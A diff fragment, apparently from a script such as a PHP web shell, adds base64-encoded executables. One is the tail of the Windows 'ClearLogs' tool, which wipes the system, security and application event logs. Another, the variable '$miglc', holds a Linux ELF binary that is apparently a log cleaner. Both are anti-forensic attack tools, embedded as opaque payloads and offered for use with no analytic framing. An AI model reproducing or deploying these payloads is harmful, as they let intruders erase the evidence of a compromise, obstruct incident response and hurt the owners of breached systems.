+AACtAlVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAAJAFHZXRNb2R1bGVGaWxlTmFtZUEAALIARnJl
+ZUVudmlyb25tZW50U3RyaW5nc0EAswBGcmVlRW52aXJvbm1lbnRTdHJpbmdzVwDSAldpZGVDaGFy
+VG9NdWx0aUJ5dGUABgFHZXRFbnZpcm9ubWVudFN0cmluZ3MACAFHZXRFbnZpcm9ubWVudFN0cmlu
+Z3NXAABtAlNldEhhbmRsZUNvdW50AABSAUdldFN0ZEhhbmRsZQAAFQFHZXRGaWxlVHlwZQBQAUdl
+dFN0YXJ0dXBJbmZvQQCdAUhlYXBEZXN0cm95AJsBSGVhcENyZWF0ZQAAvwJWaXJ0dWFsRnJlZQCf
+AUhlYXBGcmVlAAAvAlJ0bFVud2luZADfAldyaXRlRmlsZQCZAUhlYXBBbGxvYwC/AEdldENQSW5m
+bwC5AEdldEFDUAAAMQFHZXRPRU1DUAAAuwJWaXJ0dWFsQWxsb2MAAKIBSGVhcFJlQWxsb2MAPgFH
+ZXRQcm9jQWRkcmVzcwAAwgFMb2FkTGlicmFyeUEAAKoARmx1c2hGaWxlQnVmZmVycwAAagJTZXRG
+aWxlUG9pbnRlcgAA5AFNdWx0aUJ5dGVUb1dpZGVDaGFyAL8BTENNYXBTdHJpbmdBAADAAUxDTWFw
+U3RyaW5nVwAAUwFHZXRTdHJpbmdUeXBlQQAAVgFHZXRTdHJpbmdUeXBlVwAAfAJTZXRTdGRIYW5k
+bGUAABsAQ2xvc2VIYW5kbGUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAACiBAABQ2QAAAAAAAAAAAAK8gQAAAAAAAAAAAAAAAAAAAAAAA
+U3VjY2VzczogVGhlIGxvZyBoYXMgYmVlbiBjbGVhcmVkCgAARXJyb3I6IFVuYWJsZSB0byBjbGVh
+ciBsb2cgLSAAAAAlcwoARXJyb3I6IFVuYWJsZSB0byBvcGVuIGxvZyAtIAAAAAAgICAgICAgIC1z
+eXMgPSBzeXN0ZW0gbG9nCgAAICAgICAgICAtc2VjID0gc2VjdXJpdHkgbG9nCgAAAAAgICAgICAg
+IC1hcHAgPSBhcHBsaWNhdGlvbiBsb2cKACBVc2FnZTogY2xlYXJsb2dzIFtcXGNvbXB1dGVybmFt
+ZV0gPC1hcHAgLyAtc2VjIC8gLXN5cz4KCgAAAFN5c3RlbQAALXN5cwAAAABTZWN1cml0eQAAAAAt
+c2VjAAAAAEFwcGxpY2F0aW9uAC1hcHAAAAAAICAgICAgICAgICAgICAtIGh0dHA6Ly9udHNlY3Vy
+aXR5Lm51L3Rvb2xib3gvY2xlYXJsb2dzLwoKAAAAQ2xlYXJMb2dzIDEuMCAtIChjKSAyMDAyLCBB
+cm5lIFZpZHN0cm9tIChhcm5lLnZpZHN0cm9tQG50c2VjdXJpdHkubnUpCgAACgAAAA4UQAABAAAA
+OFFAAChRQADAcUAAAAAAAMBxQAABAQAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAB
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAABQAAwAsAAAAAAAAAHQAAwAQAAAAAAAAAlgAAwAQAAAAAAAAA
+jQAAwAgAAAAAAAAAjgAAwAgAAAAAAAAAjwAAwAgAAAAAAAAAkAAAwAgAAAAAAAAAkQAAwAgAAAAA
+AAAAkgAAwAgAAAAAAAAAkwAAwAgAAAAAAAAAAwAAAAcAAAAKAAAAjAAAAP////8ACgAAEAAAACAF
+kxkAAAAAAAAAAAAAAAAAAAAAAgAAAKRTQAAIAAAAeFNAAAkAAABMU0AACgAAAChTQAAQAAAA/FJA
+ABEAAADMUkAAEgAAAKhSQAATAAAAfFJAABgAAABEUkAAGQAAABxSQAAaAAAA5FFAABsAAACsUUAA
+HAAAAIRRQAB4AAAAdFFAAHkAAABkUUAAegAAAFRRQAD8AAAAUFFAAP8AAABAUUAAAAAAAAAAAABW
+REAAVkRAAFZEQABWREAAVkRAAFZEQADiZUAA4mVAAAAAIAAgACAAIAAgACAAIAAgACAAKAAoACgA
+KAAoACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAEgAEAAQABAAEAAQABAAEAAQ
+ABAAEAAQABAAEAAQABAAhACEAIQAhACEAIQAhACEAIQAhAAQABAAEAAQABAAEAAQAIEAgQCBAIEA
+gQCBAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQAQABAAEAAQABAAEACC
+AIIAggCCAIIAggACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAEAAQABAA
+EAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAECBAgAAAAApAMA
+AGCCeYIhAAAAAAAAAKbfAAAAAAAAoaUAAAAAAACBn+D8AAAAAEB+gPwAAAAAqAMAAMGj2qMgAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAACB/gAAAAAAAED+AAAAAAAAtQMAAMGj2qMgAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAACB/gAAAAAAAEH+AAAAAAAAtgMAAM+i5KIaAOWi6KJbAAAAAAAAAAAAAAAAAAAA
+AACB/gAAAAAAAEB+of4AAAAAUQUAAFHaXtogAF/aatoyAAAAAAAAAAAAAAAAAAAAAACB09je4PkA
+ADF+gf4AAAAAAAAAAAAAAAD4AwAAAQAAAC4AAAABAAAAAQAAABYAAAACAAAAAgAAAAMAAAACAAAA
+BAAAABgAAAAFAAAADQAAAAYAAAAJAAAABwAAAAwAAAAIAAAADAAAAAkAAAAMAAAACgAAAAcAAAAL
+AAAACAAAAAwAAAAWAAAADQAAABYAAAAPAAAAAgAAABAAAAANAAAAEQAAABIAAAASAAAAAgAAACEA
+AAANAAAANQAAAAIAAABBAAAADQAAAEMAAAACAAAAUAAAABEAAABSAAAADQAAAFMAAAANAAAAVwAA
+ABYAAABZAAAACwAAAGwAAAANAAAAbQAAACAAAABwAAAAHAAAAHIAAAAJAAAABgAAABYAAACAAAAA
+CgAAAIEAAAAKAAAAggAAAAkAAACDAAAAFgAAAIQAAAANAAAAkQAAACkAAACeAAAADQAAAKEAAAAC
+AAAApAAAAAsAAACnAAAADQAAALcAAAARAAAAzgAAAAIAAADXAAAACwAAABgHAAAMAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AA==";
+
+$miglc="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAIIgECDQAAAA0XAAAAAAAADQAIAAGACgAHgAbAAYAAAA0
+AAAANIAECDSABAjAAAAAwAAAAAUAAAAEAAAAAwAAAPQAAAD0gAQI9IAECBMAAAATAAAABAAAAAEA
+AAABAAAAAAAAAACABAgAgAQI4DYAAOA2AAAFAAAAABAAAAEAAADgNgAA4MYECODGBAh0AQAAmAEA
+AAYAAAAAEAAAAgAAAIw3AACMxwQIjMcECMgAAADIAAAABgAAAAQAAAAEAAAACAEAAAiBBAgIgQQI
+IAAAACAAAAAEAAAABAAAAC9saWIvbGQtbGludXguc28uMgAABAAAABAAAAABAAAAR05VAAAAAAAC
+AAAAAgAAAAUAAAARAAAAHwAAAAAAAAATAAAADAAAAAUAAAAOAAAAGQAAABUAAAAcAAAAEgAAAAIA
+AAAbAAAACwAAAB4AAAAaAAAADQAAAB0AAAAWAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAADAAAABAAAAAAAAAAAAAAACgAAAAYAAAAAAAAAAAAAAAgAAAAHAAAAAAAAAAAAAAAQAAAA
+CQAAAAEAAAAAAAAAFwAAAAAAAAAYAAAAFAAAAA8AAAARAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAv
+AAAAjIYECCcAAAASAAAA+gAAAJyGBAiBAAAAIgAAAHIAAACshgQIPQAAABIAAACkAAAAvIYECC8A
+AAASAAAAEAEAAMyGBAg3AAAAEgAAAHgAAADchgQIKQAAABIAAABKAAAA7IYECOQCAAASAAAAUQAA
+APyGBAhwAgAAEgAAAFgAAAAMhwQIXAAAABIAAACAAAAAHIcECKwAAAAiAAAAKAAAAFTIBAgEAAAA
+EQAWALwAAABYyAQIBAAAABEAFgCdAAAALIcECDAAAAASAAAA7gAAADyHBAgdAAAAEgAAANwAAABM
+hwQIxgAAABIAAAAhAAAAXIcECC4AAAASAAAAZgAAAGyHBAg9AAAAEgAAADQAAAB8hwQINwAAABIA
+AAA7AAAAjIcECIEAAAAiAAAA9QAAAJyHBAg9AAAAEgAAAGwAAACshwQIMQAAABIAAACrAAAAvIcE
+CD0BAAASAAAAwwAAAMyHBAj1AAAAEgAAAMgAAADchwQIJwAAABIAAABfAAAAXMgECAQAAAARABYA
+zQAAACSoBAgEAAAAEQAOALQAAADshwQIKQAAABIAAACYAAAA/IcECD0AAAASAAAAAQAAAAAAAAAA
+AAAAIAAAABoAAAAMiAQIHwAAABIAAAAAX19nbW9uX3N0YXJ0X18AbGliYy5zby42AHN0cmNweQBw
+cmludGYAc3Rkb3V0AGF0b2wAbWVtY3B5AF9fY3hhX2ZpbmFsaXplAHN5c3RlbQBtYWxsb2MAcmVt
+b3ZlAG9wdGFyZwBsc2VlawBiemVybwB3cml0ZQBmcHJpbnRmAF9fZGVyZWdpc3Rlcl9mcmFtZV9p
+bmZvAHJlYWQAZ2V0b3B0AHN0cmNtcABnZXRwd25hbQBzcHJpbnRmAHN0ZGVycgBleGl0AGF0b2kA
+X0lPX3N0ZGluX3VzZWQAX19saWJjX3N0YXJ0X21haW4Ac3RybGVuAG9wZW4AX19yZWdpc3Rlcl9m
+cmFtZV9pbmZvAGNsb3NlAEdMSUJDXzIuMS4zAEdMSUJDXzIuMAAAAAIAAgACAAIAAgACAAIAAgAC
+AAIAAgACAAIAAgACAAIAAgACAAMAAgACAAIAAgACAAIAAQACAAIAAAACAAAAAQACABAAAAAQAAAA
+AAAAAHMfaQkAAAMAFgEAABAAAAAQaWkNAAACACIBAAAAAAAAiMcECAYdAABUyAQIBQsAAFjIBAgF
+DAAAXMgECAUZAAAkxwQIBwEAACjHBAgHAgAALMcECAcDAAAwxwQIBwQAADTHBAgHBQAAOMcECAcG
+AAA8xwQIBwcAAEDHBAgHCAAARMcECAcJAABIxwQIBwoAAEzHBAgHDQAAUMcECAcOAABUxwQIBw8A
+AFjHBAgHEAAAXMcECAcRAABgxwQIBxIAAGTHBAgHEwAAaMcECAcUAABsxwQIBxUAAHDHBAgHFgAA
+dMcECAcXAAB4xwQIBxgAAHzHBAgHGwAAgMcECAccAACExwQIBx4AAFWJ5YPsCOjVAQAAkOhrAgAA
+6EYhAADJw/81HMcECP8lIMcECAAAAAD/JSTHBAhoAAAAAOng/////yUoxwQIaAgAAADp0P////8l
+LMcECGgQAAAA6cD/////JTDHBAhoGAAAAOmw/////yU0xwQIaCAAAADpoP////8lOMcECGgoAAAA
+6ZD/////JTzHBAhoMAAAAOmA/////yVAxwQIaDgAAADpcP////8lRMcECGhAAAAA6WD/////JUjH
+BAhoSAAAAOlQ/////yVMxwQIaFAAAADpQP////8lUMcECGhYAAAA6TD/////JVTHBAhoYAAAAOkg
+/////yVYxwQIaGgAAADpEP////8lXMcECGhwAAAA6QD/////JWDHBAhoeAAAAOnw/v///yVkxwQI
+aIAAAADp4P7///8laMcECGiIAAAA6dD+////JWzHBAhokAAAAOnA/v///yVwxwQIaJgAAADpsP7/
+//8ldMcECGigAAAA6aD+////JXjHBAhoqAAAAOmQ/v///yV8xwQIaLAAAADpgP7///8lgMcECGi4
+AAAA6XD+////JYTHBAhowAAAAOlg/v//AAAAADHtXonhg+TwUFRSaACoBAhoZIYECFFWaCCJBAjo
+C/////SJ9lWJ5VNQ6AAAAABbgcPKPgAAi4NwAAAAhcB0Av/Qi138ycOJ9pCQkJCQkJCQVYnlg+wI
+ixXsxgQIhdJ1SYsV6MYECIsChcB0Go10JgCNQgSj6MYECP8SixXoxgQIiwqFyXXquByHBAiFwHQQ
+g+wMaATHBAjoYP7//4PEELgBAAAAo+zGBAiJ7F3DjXYAVYnlg+wIiexdw422AAAAAFW4nIYECInl
+g+wIhcB0FYPsCGhgyAQIaATHBAjom/3//4PEEInsXcOQjbQmAAAAAFWJ5YPsCInsXcONtgAAAABV
+ieWB7IgHAADHhbT4//8AAAAAx4Ww+P//AAAAAMeFrPj//wAAAADHhaj4//8AAAAAx4Wk+P//////
+/8eFoPj//wAAAADHhZz4//8AAAAAx4WY+P//AAAAAMeFlPj//wAAAADHhZD4//8AAAAAx4WM+P//
+AAAAAMeFiPj//wAAAADHhYT4//8AAAAAg+wIahCNRdhQ6PP9//+DxBCD7AhoAAEAAI2F2P7//1Do
+3P3//4PEEIPsCGgAAQAAjYXY/f//UOjF/f//g8QQg+wIaAABAACNhdj8//9Q6K79//+DxBCD7Ahq
+EI2FyPz//1Domv3//4PEEIPsCGoQjYW4/P//UOiG/f//g8QQg+wIaAABAACNhbj7//9Q6G/9//+D
+xBCD7AhoAAEAAI2FuPr//1DoWP3//4PEEIPsCGgAAQAAjYW4+f//UOhB/f//g8QQg+wIaAABAACN
+hbj4//9Q6Cr9//+DxBCD7AhoQKgECI2F2P7//1Doc/3//4PEEIPsBGhKqAQI/3UM/3UI6H38//+D
+xBCJwIhF94pF9zz/dQbp7QEAAJAPvkX3g+hBiYWA+P//g72A+P//NHfCi5WA+P//iwSVcKkECP/g
+jXYAg+wI/zVcyAQIjUXYUOgO/f//g8QQjYWU+P///wDrkZCD7Az/NVzIBAjowvz//4PEEInAicCJ
+haT4///pcP///4PsCGgAAQAAjYXY/v//UOhs/P//g8QQg+wI/zVcyAQIjYXY/v//UOi0/P//g8QQ
+jYWQ+P///wDpNP///4PsCP81XMgECI2F2P3//1Doj/z//4PEEI2FhPj///8A6Q////+NdgCD7Aj/
+NVzIBAiNhdj8//9Q6Gf8//+DxBCNhYT4////AOnn/v//jXYAg+wI/zVcyAQIjYXI/P//UOg//P//
+g8QQjYWM+P///wDpv/7//412AIPsCP81XMgECI2FuPz//1DoF/z//4PEEI2FjPj///8A6Zf+//+N
+dgCD7Aj/NVzIBAiNhbj7//9Q6O/7//+DxBCNhYz4////AOlv/v//jXYAg+wM/zVcyAQI6E76//+D
+xBCJwInAiYW0+P//jYWM+P///wDpRP7//4PsDP81XMgECOgm+v//g8QQicCJwImFsPj//42FjPj/
+//8A6Rz+//+Nhaz4////AOkP/v//jXYAjYWo+P///wDp//3//412AI2FmPj///8A6e/9//+NdgCD
+vZT4//8AdR+Dvaj4//8AdRaDvZD4//8AdQ2DvYT4//8AdQTrdIn2g72s+P//AXUJg72o+P//AXRg
+g72o+P//AXUJg72M+P//BXVOg72s+P//AXULg72U+P//AHUC6zqDvaz4//8BdQuDvYz4//8AdQLr
+JoO9rPj//wF1C4O9pPj//wB1AusSg72Q+P//AXUjg72E+P//AHUag+wMi0UM/zDo4RgAAIPEEIPs
+DGoA6Gj6//+D7AxogKgECOjr+f//g8QQg+wMaMCoBAjo2/n//4PEEIPsDGgAqQQI6Mv5//+DxBCD
+vaT4////dQrHhaT4//8BAAAAgH3YAHQfg+wE/7WY+P//agGNRdhQ6LcCAACDxBCJwImFoPj//4O9
+oPj///91LIO9mPj//wF1G4PsBGgsqQQIaECpBAj/NVjIBAjo5vj//4PEEI2FiPj///8Ag72I+P//
+AXRHg72s+P//AHU+g72o+P//AHU1g72U+P//AHQsi4Wk+P//O4Wg+P//fx7/tZj4////taD4////
+taT4//+NRdhQ6A4DAACDxBCDvaz4//8BD4WkAAAAi4Wk+P//O4Wg+P//D4+SAAAAgz0AxwQIAXVI
+g+wI/zXwxgQIjYW4+v//UOh++f//g8QQg+wI/zX0xgQIjYW4+f//UOhm+f//g8QQg+wI/zX4xgQI
+jYW4+P//UOhO+f//g8QQg+wM/7WY+P///7Ww+P///7W0+P//jYW4+///UI2FyPz//1D/tZz4////
+taD4////taT4//+NRdhQ6CEKAACDxDCDvaj4//8BdXmAfdgAdCuLhaT4//87haD4//9+HYPsDItF
+DP8w6AwXAACDxBCD7AxqAOiT+P//jXYAg+wI/7WY+P///7Ww+P///7W0+P//jYW4+///UI2FuPz/
+/1CNhcj8//9Q/7Wc+P///7Wg+P///7Wk+P//jUXYUOjHEQAAg8Qwg72k+P//AXQNg72k+P//AA+F
+mwAAAIO9qPj//wAPhY4AAACDPQDHBAgBdUiD7Aj/NfDGBAiNhbj6//9Q6Ef4//+DxBCD7Aj/NfTG
+BAiNhbj5//9Q6C/4//+DxBCD7Aj/NfjGBAiNhbj4//9Q6Bf4//+DxBCD7Aj/taT4//+Nhbj5//9Q
+6H/2//+DxASJwInAUI2FuPj//1CNhbj6//9Q/7WY+P//jUXYUOiyBwAAg8Qgg72E+P//AHQj/7WY
++P//jYXY/P//UI2F2P3//1CNhdj+//9Q6PoUAACDxBCD7AxoaKkECOju9v//g8QQuAAAAADJw1WJ
+5YHsmAEAAMdF8AAAAACDfQwBD4WzAAAAg+wIagJoLKkECOj79v//g8QQicCJRfSDffT/dQ24////
+/+mfAAAAjXYAkI12AIPsBGiAAQAAjYVo/v//UP919Ogl9///g8QQicCFwHUE6zaJ9o2FaP7//4PA
+LIPsCP91CFDow/X//4PEEInAicCFwHW8ZoO9aP7//wh0so1F8P8A66uNdgCD7AhoLKkECP91CP91
+8P81/MYECP8F/MYECGhgqgQI/zVUyAQI6Jr1//+DxCCD7Az/dfTofPX//4PEEItF8InAycOJ9lWJ
+5YHsSAUAAMeF7Pz//wAAAACD7AhqII2FyPz//1DoLPb//4PEEIPsCGgAAQAAjYXI+///UOgV9v//
+g8QQg+wIaAABAACNhcj6//9Q6P71//+DxBCD7AhqAmgsqQQI6Nz1//+DxBCJwImF9Pz//4O99Pz/
+//91LIN9FAF1G4PsBGgsqQQIaIWqBAj/NVjIBAjo6vT//4PEEIPsDGr/6M31//+Qg+wIakJonKoE
+COiN9f//g8QQicCJhfD8//+DvfD8////dSmDfRQBdRaD7AhowKoECP81WMgECOig9P//g8QQg+wM
+av/og/X//412AIPsBGoAagD/tfT8///oDvX//4PEEIPsBGoAagD/tfD8///o+fT//4PEEIn2g+wE
+aIABAACNhfj8//9Q/7X0/P//6Gr1//+DxBCJwD2AAQAAdAbpNQIAAJCNhfj8//+DwCyD7Aj/dQhQ
+6AP0//+DxBCJwInAhcAPhewBAABmg734/P//CA+E3gEAAI2F7Pz///8Ai1UMi0UQKdBAOYXs/P//
+dX2DfQwAdC2D7AhoLKkECP91DP91CP81/MYECP8F/MYECGgAqwQI/zVUyAQI6L3z//+DxCCLhfz8
+//+Jhej8//+D7AiNhfj8//+DwAhQjYXI/P//UOjF9P//g8QQg+wIjYX4/P//g8BMUI2FyPv//1Do
